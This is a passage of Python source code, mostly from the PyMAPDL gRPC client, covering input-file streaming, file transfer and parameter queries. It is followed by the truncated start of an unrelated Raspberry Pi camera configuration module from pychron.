raise ValueError("``time_step_stream`` must be greater than 0``")
if verbose:
if time_step_stream is None:
time_step_stream = 500
metadata = [
("time_step_stream", str(time_step_stream)),
("chunk_size", str(chunk_size)),
]
request = pb_types.InputFileRequest(filename=filename)
strouts = self._stub.InputFileS(request, metadata=metadata)
responses = []
for strout in strouts:
lines = strout.cmdout
# print out input as it is being run
print("\n".join(lines))
responses.extend(lines)
response = "\n".join(responses)
return response.strip()
# otherwise, not verbose
if time_step_stream is None:
time_step_stream = 50
metadata = [
("time_step_stream", str(time_step_stream)),
("chunk_size", str(chunk_size)),
]
# since we can't directly run /INPUT, we have to write a
# temporary input file that tells mainan to read the input
# file.
tmp_name = "_input_tmp_.inp"
tmp_out = "_input_tmp_.out"
if "CDRE" in orig_cmd.upper():
# Using CDREAD
option = kwargs.get("cd_read_option", "COMB")
tmp_dat = f"/OUT,{tmp_out}\n{orig_cmd},'{option}','{filename}'\n"
else:
# Using default INPUT
tmp_dat = f"/OUT,{tmp_out}\n{orig_cmd},'{filename}'\n"
if self._local:
local_path = self.directory
with open(os.path.join(local_path, tmp_name), "w") as f:
f.write(tmp_dat)
else:
self._upload_raw(tmp_dat.encode(), tmp_name)
request = pb_types.InputFileRequest(filename=tmp_name)
# even though we don't care about the output, we still
# need to check. otherwise, since inputfile is
# non-blocking, we could corrupt the service
chunks = self._stub.InputFileS(request, metadata=metadata)
_ = [chunk.cmdout for chunk in chunks] # unstable
# all output (unless redirected) has been written to a temp output
if self._local: # pragma: no cover
with open(os.path.join(local_path, tmp_out)) as f:
output = f.read()
# delete the files to avoid overwriting:
try:
os.remove(tmp_name)
except OSError:
pass
try:
os.remove(tmp_out)
except OSError:
pass
# otherwise, read remote file
else:
output = self._download_as_raw(tmp_out).decode("latin-1")
# Deleting the previous files
self.slashdelete(tmp_name)
self.slashdelete(tmp_out)
return output
def _get_file_path(self, fname, progress_bar=False):
"""Find files in the Python and MAPDL working directories.
**The priority is for the Python directory.**
Hence if the same file is in the Python directory and in the MAPDL directory,
PyMAPDL will upload a copy from the Python directory to the MAPDL directory,
overwriting the MAPDL directory copy.
"""
if os.path.isdir(fname):
raise ValueError(
f"`fname` should be a full file path or name, not the directory '{fname}'."
)
fpath = os.path.dirname(fname)
fname = os.path.basename(fname)
fext = fname.split(".")[-1]
ffullpath = os.path.join(fpath, fname)
if os.path.exists(ffullpath) and self._local:
return ffullpath
if self._local:
if os.path.isfile(fname):
# And it exists
filename = os.path.join(os.getcwd(), fname)
elif fname in self.list_files():
# It exists in the Mapdl working directory
filename = os.path.join(self.directory, fname)
else:
# Finally
raise FileNotFoundError(f"Unable to locate filename '{fname}'")
else: # Non-local
# upload the file if it exists locally
if os.path.isfile(ffullpath):
self.upload(ffullpath, progress_bar=progress_bar)
filename = fname
elif fname in self.list_files():
# It exists in the Mapdl working directory
filename = fname
else:
raise FileNotFoundError(f"Unable to locate filename '{fname}'")
return filename
def _flush_stored(self):
"""Writes stored commands to an input file and runs the input
file. Used with non_interactive.
"""
self._log.debug("Flushing stored commands")
commands = "\n".join(self._stored_commands)
if self._apdl_log:
self._apdl_log.write(commands + "\n")
self._log.debug(
"Writing the following commands to a temporary " "apdl input file:\n%s",
commands,
)
# write to a temporary input file
def build_rand_tmp():
return os.path.join(tempfile.gettempdir(), f"tmp_{random_string()}.inp")
# rare case of duplicated tmpfile (birthday problem)
tmp_filename = build_rand_tmp()
while os.path.isfile(tmp_filename):
tmp_filename = build_rand_tmp()
with open(tmp_filename, "w") as fid:
fid.writelines(commands)
self._store_commands = False
self._stored_commands = []
# run the stored commands
out = self.input(
tmp_filename,
write_to_log=False,
verbose=False,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=False,
)
# skip the first line as it simply states that it's reading an input file
self._response = out[out.find("LINE= 0") + 13 :]
self._log.info(self._response)
if "*** ERROR ***" in self._response:
raise RuntimeError(
self._response.split("*** ERROR ***")[1].splitlines()[1].strip()
)
# try/except here because MAPDL might have not closed the temp file
try:
os.remove(tmp_filename)
except:
self._log.warning("Unable to remove temporary file %s", tmp_filename)
@protect_grpc
def _get(self, entity, entnum, item1, it1num, item2, it2num):
"""Sends gRPC *Get request.
.. warning::
Not thread safe. Uses ``_get_lock`` to ensure multiple
request are not evaluated simultaneously.
"""
if self._store_commands:
raise RuntimeError(
"Cannot use gRPC enabled ``GET`` when in non_interactive mode. "
"Exit non_interactive mode before using this method."
)
cmd = f"{entity},{entnum},{item1},{it1num},{item2},{it2num}"
# not threadsafe; don't allow multiple get commands
while self._get_lock:
time.sleep(0.001)
self._get_lock = True
try:
getresponse = self._stub.Get(pb_types.GetRequest(getcmd=cmd))
finally:
self._get_lock = False
if getresponse.type == 0:
raise ValueError(
"This is either an invalid get request, or MAPDL is set"
" to the wrong processor (e.g. on BEGIN LEVEL vs."
" POST26)"
)
if getresponse.type == 1:
return getresponse.dval
elif getresponse.type == 2:
return getresponse.sval
raise RuntimeError(f"Unsupported type {getresponse.type} response from MAPDL")
def download_project(self, extensions=None, target_dir=None):
"""Download all the project files located in the MAPDL working directory.
Parameters
----------
extensions : List[Str], Tuple[Str], optional
List of extensions to filter the files before downloading,
by default None.
target_dir : Str, optional
Path where the downloaded files will be located, by default None.
Returns
-------
List[Str]
List of downloaded files.
"""
if not extensions:
files = self.list_files()
list_of_files = self.download(files, target_dir=target_dir)
else:
list_of_files = []
for each_extension in extensions:
list_of_files.extend(
self.download(files=f"*.{each_extension}", target_dir=target_dir)
)
return list_of_files
def download(
self,
files,
target_dir=None,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=True,
recursive=False,
): # pragma: no cover
"""Download files from the gRPC instance workind directory
.. warning:: This feature is only available for MAPDL 2021R1 or newer.
Parameters
----------
files : str or List[str] or Tuple(str)
Name of the file on the server. File must be in the same
directory as the mapdl instance. A list of string names or
tuples of string names can also be used.
List current files with :func:`Mapdl.directory <ansys.mapdl.core.Mapdl.list_files>`.
Alternatively, you can also specify **glob expressions** to
match file names. For example: `'file*'` to match every file whose
name starts with `'file'`.
chunk_size : int, optional
Chunk size in bytes. Must be less than 4MB. Defaults to 256 kB.
progress_bar : bool, optional
Display a progress bar using
``tqdm`` when ``True``. Helpful for showing download
progress.
recursive : bool
Use recursion when using glob pattern.
Notes
-----
There are some considerations to keep in mind when using this command:
* The glob pattern search does not search recursively in remote instances.
* In a remote instance, it is not possible to list or download files in different
locations than the MAPDL working directory.
* If you are in local and provide a file path, downloading files
from a different folder is allowed.
However it is not a recommended approach.
Examples
--------
Download a single file:
>>> mapdl.download('file.out')
Download all the files starting with `'file'`:
>>> mapdl.download('file*')
Download every single file in the MAPDL workind directory:
>>> mapdl.download('*.*')
Alternatively, you can download all the files using
:func:`Mapdl.download_project <ansys.mapdl.core.mapdl_grpc.MapdlGrpc.download_project>` (recommended):
>>> mapdl.download_project()
"""
if chunk_size > 4 * 1024 * 1024: # 4MB
raise ValueError(
f"Chunk sizes bigger than 4 MB can generate unstable behaviour in PyMAPDL. "
"Please decrease ``chunk_size`` value."
)
self_files = self.list_files() # to avoid calling it too much
if isinstance(files, str):
if self._local: # pragma: no cover
# in local mode
if os.path.exists(files):
# file exist
list_files = [files]
elif "*" in files:
list_files = glob.glob(files, recursive=recursive) # using filter
if not list_files:
raise ValueError(
f"The `'files'` parameter ({files}) didn't match any file using glob expressions in the local client."
)
else:
raise ValueError(
f"The files parameter ('{files}') does not match any file or pattern."
)
else: # Remote or looking into MAPDL working directory
if files in self_files:
list_files = [files]
elif "*" in files:
# try filter on the list_files
if recursive:
warn(
"The 'recursive' keyword argument does not work with remote instances. So it is ignored."
)
list_files = fnmatch.filter(self_files, files)
if not list_files:
raise ValueError(
f"The `'files'` parameter ({files}) didn't match any file using glob expressions in the remote server."
)
else:
raise ValueError(
f"The `'files'` parameter ('{files}') does not match any file or pattern."
)
elif isinstance(files, (list, tuple)):
if not all([isinstance(each, str) for each in files]):
raise ValueError(
"The parameter `'files'` can be a list or tuple, but it should only contain strings."
)
list_files = files
else:
raise ValueError(
f"The `file` parameter type ({type(files)}) is not supported."
"Only strings, tuple of strings or list of strings are allowed."
)
if target_dir:
try:
os.mkdir(target_dir)
except FileExistsError:
pass
else:
target_dir = os.getcwd()
for each_file in list_files:
try:
file_name = os.path.basename(
each_file
) # Getting only the name of the file.
# We try to avoid that when the full path is supplied, it will crash when trying
# to do `os.path.join(target_dir"os.getcwd()", file_name "full filename path"`
# This will produce the file structure to flat out, but it is find, because recursive
# does not work in remote.
self._download(
each_file,
out_file_name=os.path.join(target_dir, file_name),
chunk_size=chunk_size,
progress_bar=progress_bar,
)
except FileNotFoundError:
# So far the grpc interface returns size of the file equal
# zero, if the file does not exists or its size is zero,
# but they are two different things!
# In theory, since we are obtaining the files name from
# `mapdl.list_files()` they do exist, so
# if there is any error, it means their size is zero.
pass # this is not the best.
return list_files
@protect_grpc
def _download(
self,
target_name,
out_file_name=None,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=True,
):
"""Download a file from the gRPC instance
Parameters
----------
target_name : str
Target file on the server. File must be in the same
directory as the mapdl instance. List current files with
``mapdl.list_files()``
out_file_name : str, optional
Save the filename as a different name other than the
``target_name``.
chunk_size : int, optional
Chunk size in bytes. Must be less than 4MB. Defaults to 256 kB.
progress_bar : bool, optional Display a progress bar using
``tqdm`` when ``True``. Helpful for showing download
progress.
Examples
--------
Download the remote result file "file.rst" as "my_result.rst"
>>> mapdl.download('file.rst', 'my_result.rst')
"""
if out_file_name is None:
out_file_name = target_name
request = pb_types.DownloadFileRequest(name=target_name)
metadata = [("time_step_stream", "200"), ("chunk_size", str(chunk_size))]
chunks = self._stub.DownloadFile(request, metadata=metadata)
file_size = save_chunks_to_file(
chunks, out_file_name, progress_bar=progress_bar, target_name=target_name
)
if not file_size:
raise FileNotFoundError(f'File "{target_name}" is empty or does not exist')
@protect_grpc
def upload(self, file_name, progress_bar=True):
"""Upload a file to the grpc instance
file_name : str
Local file to upload.
progress_bar : bool, optional Display a progress bar using
``tqdm`` when ``True``. Helpful for showing download
progress.
Returns
-------
str
Base name of the file uploaded. File can be accessed
relative to the mapdl instance with this file name.
Examples
--------
Upload "local_file.inp" while disabling the progress bar
>>> mapdl.upload('local_file.inp', progress_bar=False)
"""
if not os.path.isfile(file_name):
raise FileNotFoundError(f"Unable to locate filename {file_name}")
chunks_generator = get_file_chunks(file_name, progress_bar=progress_bar)
response = self._stub.UploadFile(chunks_generator)
if not response.length:
raise IOError("File failed to upload")
return os.path.basename(file_name)
@protect_grpc
def _get_array(
self,
entity="",
entnum="",
item1="",
it1num="",
item2="",
it2num="",
kloop="",
**kwargs,
):
"""gRPC VGET request.
Send a vget request, receive a bytes stream, and return it as
a numpy array.
Not thread safe as it uses a constant internal temporary
parameter name. This method uses _vget_lock to ensure
multiple simultaneous request fail.
Returns
-------
values : np.ndarray
Numpy 1D array containing the requested *VGET item and entity.
"""
if "parm" in kwargs:
raise ValueError("Parameter name `parm` not supported with gRPC")
while self._vget_lock:
time.sleep(0.001)
self._vget_lock = True
cmd = f"{entity},{entnum},{item1},{it1num},{item2},{it2num},{kloop}"
try:
chunks = self._stub.VGet2(pb_types.GetRequest(getcmd=cmd))
values = parse_chunks(chunks)
finally:
self._vget_lock = False
return values
def _screenshot_path(self):
"""Returns the local path of the MAPDL generated screenshot.
If necessary, downloads the remotely rendered file.
"""
if self._local:
return super()._screenshot_path()
all_filenames = self.list_files()
filenames = []
for filename in all_filenames:
if ".png" == filename[-4:]:
filenames.append(filename)
filenames.sort()
filename = os.path.basename(filenames[-1])
temp_dir = tempfile.gettempdir()
save_name = os.path.join(temp_dir, "tmp.png")
self._download(filename, out_file_name=save_name)
return save_name
@protect_grpc
def _download_as_raw(self, target_name):
"""Download a file from the gRPC instance as a binary
string without saving it to disk.
"""
request = pb_types.DownloadFileRequest(name=target_name)
chunks = self._stub.DownloadFile(request)
return b"".join([chunk.payload for chunk in chunks])
@property
def is_alive(self) -> bool:
"""True when there is an active connect to the gRPC server"""
if self._exited:
return False
if self.busy:
return True
try:
return bool(self.inquire("", "JOBNAME"))
except:
return False
@property
def xpl(self):
"""MAPDL file explorer
Iteratively navigate through MAPDL files.
Examples
--------
Read the MASS record from the "file.full" file
>>> from ansys import Mapdl
>>> mapdl = Mapdl()
>>> xpl = mapdl.xpl
>>> xpl.open('file.full')
>>> vec = xpl.read('MASS')
>>> vec.asarray()
array([ 4, 7, 10, 13, 16, 19, 22, 25, 28, 31, 34, 37, 40, 43, 46, 49, 52,
55, 58, 1], dtype=int32)
"""
return self._xpl
@protect_grpc
def scalar_param(self, pname):
"""Return a scalar parameter as a float.
If parameter does not exist, returns ``None``.
"""
request = pb_types.ParameterRequest(name=pname, array=False)
presponse = self._stub.GetParameter(request)
if presponse.val:
return float(presponse.val[0])
@protect_grpc
def _upload_raw(self, raw, save_as): # consider private
"""Upload a binary string as a file"""
chunks = chunk_raw(raw, save_as)
response = self._stub.UploadFile(chunks)
if response.length != len(raw):
raise IOError("Raw Bytes failed to upload")
# TODO: not fully tested/implemented
@protect_grpc
def Param(self, pname):
presponse = self._stub.GetParameter(pb_types.ParameterRequest(name=pname))
return presponse.val
# TODO: not fully tested/implemented
@protect_grpc
def Var(self, num):
presponse = self._stub.GetVariable(pb_types.VariableRequest(inum=num))
return presponse.val
@property
def math(self):
"""APDL math interface
Returns
-------
:class:`MapdlMath <ansys.mapdl.core.math.MapdlMath>`
Examples
--------
Get the stiffness matrix from MAPDL
>>> mm = mapdl.math.stiff()
>>> matrix = k.asarray()
<60x60 sparse matrix of type '<class 'numpy.float64'>'
with 1734 stored elements in Compressed Sparse Row format>
Get the mass matrix from mapdl
>>> mm = mapdl.math.stiff()
>>> matrix = k.asarray()
<60x60 sparse matrix of type '<class 'numpy.float64'>'
with 1734 stored elements in Compressed Sparse Row format>
"""
from ansys.mapdl.core.math import MapdlMath
return MapdlMath(self)
@property
@check_version.version_requires((0, 4, 1))
def db(self):
"""
MAPDL database interface.
Returns
-------
:class:`MapdlDb <ansys.mapdl.core.database.MapdlDb>`
Examples
--------
Create a nodes instance.
>>> from ansys.mapdl.core import launch_mapdl
>>> mapdl = launch_mapdl()
>>> # create nodes...
>>> nodes = mapdl.db.nodes
>>> print(nodes)
MAPDL Database Nodes
Number of nodes: 270641
Number of selected nodes: 270641
Maximum node number: 270641
>>> mapdl.nsel("NONE")
>>> print(nodes)
MAPDL Database Nodes
Number of nodes: 270641
Number of selected nodes: 0
Maximum node number: 270641
Return the selection status and the coordinates of node 22.
>>> nodes = mapdl.db.nodes
>>> sel, coord = nodes.coord(22)
>>> coord
(1.0, 0.5, 0.0, 0.0, 0.0, 0.0)
"""
from ansys.mapdl.core.database import MapdlDb
if self._db is None:
self._db = MapdlDb(self)
self._db.start()
return self._db
@protect_grpc
def _data_info(self, pname):
"""Returns the data type of a parameter
APDLMATH vectors only.
"""
request = pb_types.ParameterRequest(name=pname)
return self._stub.GetDataInfo(request)
@protect_grpc
def _vec_data(self, pname):
"""Downloads vector data from a MAPDL MATH parameter"""
dtype = ANSYS_VALUE_TYPE[self._data_info(pname).stype]
request = pb_types.ParameterRequest(name=pname)
chunks = self._stub.GetVecData(request)
return parse_chunks(chunks, dtype)
@protect_grpc
def _mat_data(self, pname, raw=False):
"""Downloads matrix data from a parameter and returns a scipy sparse array"""
try:
from scipy import sparse
except ImportError: # pragma: no cover
raise ImportError("Install ``scipy`` to use this feature") from None
minfo = self._data_info(pname)
stype = ANSYS_VALUE_TYPE[minfo.stype]
mtype = minfo.objtype
shape = (minfo.size1, minfo.size2)
if mtype == 2: # dense
request = pb_types.ParameterRequest(name=pname)
chunks = self._stub.GetMatData(request)
values = parse_chunks(chunks, stype)
return np.transpose(np.reshape(values, shape[::-1]))
elif mtype == 3: # sparse
indptr = self._vec_data(pname + "::ROWS")
indices = self._vec_data(pname + "::COLS")
vals = self._vec_data(pname + "::VALS")
if raw: # for debug
return vals, indices, indptr, shape
else:
return sparse.csr_matrix(
(vals, indices, indptr), dtype=stype, shape=shape
)
raise ValueError(f'Invalid matrix type "{mtype}"')
@property
def locked(self):
"""Instance is in use within a pool"""
return self._locked
@locked.setter
def locked(self, new_value):
self._locked = new_value
@supress_logging
def __str__(self):
try:
if self._exited:
return "MAPDL exited"
stats = self.slashstatus("PROD", mute=False)
except: # pragma: no cover
return "MAPDL exited"
st = stats.find("*** Products ***")
en = stats.find("*** PrePro")
product = "\n".join(stats[st:en].splitlines()[1:]).strip()
info = f"Product: {product}\n"
info += f"MAPDL Version: {self.version}\n"
info += f"ansys.mapdl Version: {__version__}\n"
return info
@supress_logging
@run_as_prep7
def _generate_iges(self):
"""Save IGES geometry representation to disk"""
basename = "_tmp.iges"
if self._local:
filename = os.path.join(self.directory, basename)
self.igesout(basename, att=1)
else:
self.igesout(basename, att=1)
filename = os.path.join(tempfile.gettempdir(), basename)
self._download(basename, filename, progress_bar=False)
return filename
@property
def _distributed_result_file(self):
"""Path of the distributed result file"""
if not self._distributed:
return
try:
filename = self.inquire("", "RSTFILE")
if not filename:
filename = self.jobname
except:
filename = self.jobname
# ansys decided that a jobname ended in a number needs a bonus "_"
if filename[-1].isnumeric():
filename += "_"
rth_basename = "%s0.%s" % (filename, "rth")
rst_basename = "%s0.%s" % (filename, "rst")
rth_file = os.path.join(self.directory, rth_basename)
rst_file = os.path.join(self.directory, rst_basename)
if self._prioritize_thermal:
if not os.path.isfile(rth_file):
raise FileNotFoundError("Thermal Result not available")
return rth_file
if os.path.isfile(rth_file) and os.path.isfile(rst_file):
return last_created([rth_file, rst_file])
elif os.path.isfile(rth_file):
return rth_file
elif os.path.isfile(rst_file):
return rst_file
@property
def _result_file(self):
"""Path of the non-distributed result file"""
try:
filename = self.inquire("", "RSTFILE")
if not filename:
filename = self.jobname
except:
filename = self.jobname
try:
ext = self.inquire("", "RSTEXT")
except: # check if rth file exists
ext = ""
if ext == "":
rth_file = os.path.join(self.directory, "%s.%s" % (filename, "rth"))
rst_file = os.path.join(self.directory, "%s.%s" % (filename, "rst"))
if self._prioritize_thermal and os.path.isfile(rth_file):
return rth_file
if os.path.isfile(rth_file) and os.path.isfile(rst_file):
return last_created([rth_file, rst_file])
elif os.path.isfile(rth_file):
return rth_file
elif os.path.isfile(rst_file):
return rst_file
else:
filename = os.path.join(self.directory, "%s.%s" % (filename, ext))
if os.path.isfile(filename):
return filename
@property
def thermal_result(self):
"""The thermal result object"""
self._prioritize_thermal = True
result = self.result
self._prioritize_thermal = False
return result
def list_error_file(self):
"""Listing of errors written in JOBNAME.err"""
files = self.list_files()
jobname = self.jobname
error_file = None
for test_file in [f"{jobname}.err", f"{jobname}0.err"]:
if test_file in files:
error_file = test_file
break
if not error_file:
return None
if self.local:
return open(os.path.join(self.directory, error_file)).read()
elif self._exited:
raise MapdlExitedError(
"Cannot list error file when MAPDL Service has " "exited"
)
return self._download_as_raw(error_file).decode("latin-1")
@property
def result(self):
"""Binary interface to the result file using ``pyansys.Result``
Examples
--------
>>> mapdl.solve()
>>> mapdl.finish()
>>> result = mapdl.result
>>> print(result)
PyANSYS MAPDL Result file object
Units : User Defined
Version : 18.2
Cyclic : False
Result Sets : 1
Nodes : 3083
Elements : 977
Available Results:
EMS : Miscellaneous summable items (normally includes face pressures)
ENF : Nodal forces
ENS : Nodal stresses
ENG : Element energies and volume
EEL : Nodal elastic strains
ETH : Nodal thermal strains (includes swelling strains)
EUL : Element euler angles
EMN : Miscellaneous nonsummable items
EPT : Nodal temperatures
NSL : Nodal displacements
RF : Nodal reaction forces
"""
from ansys.mapdl.reader import read_binary
from ansys.mapdl.reader.rst import Result
if not self._local:
# download to temporary directory
save_path = os.path.join(tempfile.gettempdir())
result_path = self.download_result(save_path)
else:
if self._distributed_result_file and self._result_file:
result_path = self._distributed_result_file
result = Result(result_path, read_mesh=False)
if result._is_cyclic:
result_path = self._result_file
else:
# return the file with the last access time
filenames = [self._distributed_result_file, self._result_file]
result_path = last_created(filenames)
if result_path is None: # if same return result_file
result_path = self._result_file
elif self._distributed_result_file:
result_path = self._distributed_result_file
result = Result(result_path, read_mesh=False)
if result._is_cyclic:
if not os.path.isfile(self._result_file):
raise RuntimeError("Distributed Cyclic result not supported")
result_path = self._result_file
else:
result_path = self._result_file
if result_path is None:
raise FileNotFoundError("No result file(s) at %s" % self.directory)
if not os.path.isfile(result_path):
raise FileNotFoundError("No results found at %s" % result_path)
return read_binary(result_path)
@wraps(_MapdlCore.igesin)
def igesin(self, fname="", ext="", **kwargs):
"""Wrap the IGESIN command to handle the remote case."""
if self._local:
out = super().igesin(fname, ext, **kwargs)
elif not fname:
out = super().igesin(**kwargs)
elif fname in self.list_files():
# check if this file is already remote
out = super().igesin(fname, ext, **kwargs)
else:
if not os.path.isfile(fname):
raise FileNotFoundError(
f"Unable to find {fname}. You may need to"
"input the full path to the file."
)
basename = self.upload(fname, progress_bar=False)
out = super().igesin(basename, **kwargs)
return out
@wraps(_MapdlCore.cmatrix)
def cmatrix(
self, symfac="", condname="", numcond="", grndkey="", capname="", **kwargs
):
"""Run CMATRIX in non-interactive mode and return the response
from file.
"""
# The CMATRIX command needs to run in non-interactive mode
if not self._store_commands:
with self.non_interactive:
super().cmatrix(symfac, condname, numcond, grndkey, capname, **kwargs)
self._response = self._download_as_raw("cmatrix.out").decode()
return self._response
# otherwise, simply run cmatrix as we're already in
# non-interactive and there's no output to return
super().cmatrix(symfac, condname, numcond, grndkey, capname, **kwargs)
@property
def _name(self):
"""Instance unique identifier."""
if self._ip or self._port:
return f"GRPC_{self._ip}:{self._port}"
return f"GRPC_instance_{id(self)}"
def get_name(self):
return self._name
@property
def _distributed(self) -> bool:
"""MAPDL is running in distributed mode."""
if self.__distributed is None:
self.__distributed = self.parameters.numcpu > 1
return self.__distributed
@wraps(_MapdlCore.ndinqr)
def ndinqr(self, node, key, **kwargs):
"""Wrap the ``ndinqr`` method to take advantage of the gRPC methods."""
super().ndinqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.elmiqr)
def elmiqr(self, ielem, key, **kwargs):
"""Wrap the ``elmiqr`` method to take advantage of the gRPC methods."""
super().elmiqr(ielem, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.kpinqr)
def kpinqr(self, knmi, key, **kwargs):
"""Wrap the ``kpinqr`` method to take advantage of the gRPC methods."""
super().kpinqr(knmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.lsinqr)
def lsinqr(self, line, key, **kwargs):
"""Wrap the ``lsinqr`` method to take advantage of the gRPC methods."""
super().lsinqr(line, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.arinqr)
def arinqr(self, anmi, key, **kwargs):
"""Wrap the ``arinqr`` method to take advantage of the gRPC methods."""
super().arinqr(anmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.vlinqr)
def vlinqr(self, vnmi, key, **kwargs):
"""Wrap the ``vlinqr`` method to take advantage of the gRPC methods."""
super().vlinqr(vnmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.rlinqr)
def rlinqr(self, nreal, key, **kwargs):
"""Wrap the ``rlinqr`` method to take advantage of the gRPC methods."""
super().rlinqr(nreal, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.gapiqr)
def gapiqr(self, ngap, key, **kwargs):
"""Wrap the ``gapiqr`` method to take advantage of the gRPC methods."""
super().gapiqr(ngap, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.masiqr)
def masiqr(self, node, key, **kwargs):
"""Wrap the ``masiqr`` method to take advantage of the gRPC methods."""
super().masiqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.ceinqr)
def ceinqr(self, nce, key, **kwargs):
"""Wrap the ``ceinqr`` method to take advantage of the gRPC methods."""
super().ceinqr(nce, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.cpinqr)
def cpinqr(self, ncp, key, **kwargs):
"""Wrap the ``cpinqr`` method to take advantage of the gRPC methods."""
super().cpinqr(ncp, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.csyiqr)
def csyiqr(self, ncsy, key, **kwargs):
"""Wrap the ``csyiqr`` method to take advantage of the gRPC methods."""
super().csyiqr(ncsy, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.etyiqr)
def etyiqr(self, itype, key, **kwargs):
"""Wrap the ``etyiqr`` method to take advantage of the gRPC methods."""
super().etyiqr(itype, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.foriqr)
def foriqr(self, node, key, **kwargs):
"""Wrap the ``foriqr`` method to take advantage of the gRPC methods."""
super().foriqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.sectinqr)
def sectinqr(self, nsect, key, **kwargs):
"""Wrap the ``sectinqr`` method to take advantage of the gRPC methods."""
super().sectinqr(nsect, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.mpinqr)
def mpinqr(self, mat, iprop, key, **kwargs):
"""Wrap the ``mpinqr`` method to take advantage of the gRPC methods."""
super().mpinqr(mat, iprop, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.dget)
def dget(self, node, idf, kcmplx, **kwargs):
"""Wrap the ``dget`` method to take advantage of the gRPC methods."""
super().dget(node, idf, kcmplx, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.fget)
def fget(self, node, idf, kcmplx, **kwargs):
"""Wrap the ``fget`` method to take advantage of the gRPC methods."""
super().fget(node, idf, kcmplx, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.erinqr)
def erinqr(self, key, **kwargs):
"""Wrap the ``erinqr`` method to take advantage of the gRPC methods."""
super().erinqr(key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.wrinqr)
def wrinqr(self, key, **kwargs):
"""Wrap the ``wrinqr`` method to take advantage of the gRPC methods."""
super().wrinqr(key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
|
rpi_camera.py
|
# ===============================================================================
# Copyright 2016 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
import os
from threading import Thread
import picamera
import picamera.array
# ============= standard library imports ========================
# ============= local library imports ==========================
import time
from pychron.core.helpers.filetools import unique_path2
from pychron.headless_config_loadable import HeadlessConfigLoadable
from pychron.paths import paths
from six.moves import map
class RPiCamera(HeadlessConfigLoadable):
sharpness = 0
contrast = 0
brightness = 50
saturation = 0
ISO = 0
video_stabilization = False
exposure_compensation = 0
# exposure modes
# off, auto, night, nightpreview, backlight, spotlight, sports, snow, beach,
# verylong, fixedfps, antishake, fireworks,
exposure_mode = "auto"
meter_mode = "average" # stop, average, backlit, matrix
# awb_modes
# off, auto, sunlight, cloudy, shade, tungsten, fluorescent, incandescent, flash, horizon
awb_mode = "auto"
# image effects
# none, negative, solarize, sketch, denoise, emboss, oilpaint, hatch,
# gpen, pastel, watercolor,film, blur, saturation, colorswap, washedout,
# posterise, colorpoint, colorbalance, cartoon, deinterlace1, deinterlace2
image_effect = "none"
color_effects = None # (u,v)
rotation = 0 # 0,90,180,270
hflip = False
vflip = False
crop = (0.0, 0.0, 1.0, 1.0)
frame_rate = 10
def load_additional_args(self, *args, **kw):
config = self.get_configuration()
self.set_attribute(config, "sharpness", "Settings", "sharpness", cast="int")
self.set_attribute(config, "contrast", "Settings", "contrast", cast="int")
self.set_attribute(config, "brightness", "Settings", "brightness", cast="int")
self.set_attribute(config, "saturation", "Settings", "saturation", cast="int")
self.set_attribute(config, "ISO", "Settings", "ISO", cast="int")
self.set_attribute(
config,
"video_stabilization",
"Settings",
"video_stabilization",
cast="boolean",
)
self.set_attribute(
config,
"exposure_compensation",
"Settings",
"exposure_compensation",
cast="int",
)
self.set_attribute(config, "exposure_mode", "Settings", "exposure_mode")
self.set_attribute(config, "meter_mode", "Settings", "meter_mode")
self.set_attribute(config, "awb_mode", "Settings", "awb_mode")
self.set_attribute(config, "image_effect", "Settings", "image_effect")
self.set_attribute(config, "color_effects", "Settings", "color_effects")
self.set_attribute(config, "rotation", "Settings", "rotation", cast="int")
self.set_attribute(config, "hflip", "Settings", "hflip", cast="boolean")
self.set_attribute(config, "vflip", "Settings", "vflip", cast="boolean")
crop = self.config_get(config, "Settings", "crop")
if crop:
self.crop = tuple(map(float, crop.split(",")))
return True
def start_video_service(self):
def func():
root = "/var/www/firm_cam"
if not os.path.isdir(root):
os.mkdir(root)
